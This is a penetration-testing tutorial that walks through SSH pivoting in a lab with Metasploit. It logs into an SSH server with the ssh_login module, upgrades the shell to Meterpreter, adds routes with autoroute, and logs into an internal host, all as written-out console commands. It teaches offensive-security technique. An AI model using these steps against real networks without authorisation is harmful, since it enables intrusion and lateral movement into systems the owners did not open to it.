If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Establishing Initial Access via SSH Login

Pivoting is a technique to get inside an unreachable network with the help of a pivot (center point). In simple words, it is an attack through which an attacker can exploit a system that belongs to a different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network, and then the attacker will able to target the client system for the attack.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database. This module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username raj
msf auxiliary(ssh_login) > set password 123
msf auxiliary(ssh_login) > exploit

From the given image you can observe that command shell session 1 opened

Now convert command shell into the meterpreter shell through the following command

sessions –u 1

From the given image you can observe that Meterpreter session 2 opened

sessions

 Hence, if you count, then the current attacker holds 2 sessions. 1^st for the command shell and 2^nd for the meterpreter shell of the SSH server.

Using Autoroute for Internal Network Pivoting

Check network interface using ifconfig command.

From the given image, you can observe two network interfaces in the victim’s system, 1^st for IP 192.168.0.109. Through which the attacker is connected, and 2^nd for IP 192.168.10.1 through which the SSH client (targets) is connected.

Since the attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface, therefore, it is not possible to directly make an attack on client network until unless the attacker acquires the same network connection. In order to achieve 192.168.10.0 network attacker need to run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. The default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 
msf post(autoroute) > set subnet 192.168.10.0
msf post(autoroute) > set session 2
msf post(autoroute) > exploit

Gaining Access to the Internal SSH Client

This time, we are exploiting SSH Ignite (local client). Therefore, we are going to use the same module for it that had used above for SSH raj, only need to change the information inside the exploit.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.10.2
msf auxiliary(ssh_login) > set username ignite
msf auxiliary(ssh_login) > set password 1234
msf auxiliary(ssh_login) > exploit

 From the given image, you can see another command shell 3 opened if you count; then the total attack holds 3 sessions, two for the SSH server and one for the SSH client.

sessions

1. Command shell for SSH raj (192.168.0.109:22)
2. Meterpreter shell for SSH raj (192.168.0.109)
3. Command shell for SSH ignite (192.168.10.2:22)

sessions 3

Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.

ifconfig

From given, you can observe the network IP is 192.168.10.2

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related posts:

A Detailed Guide on Chisel A Detailed Guide on Ligolo-Ng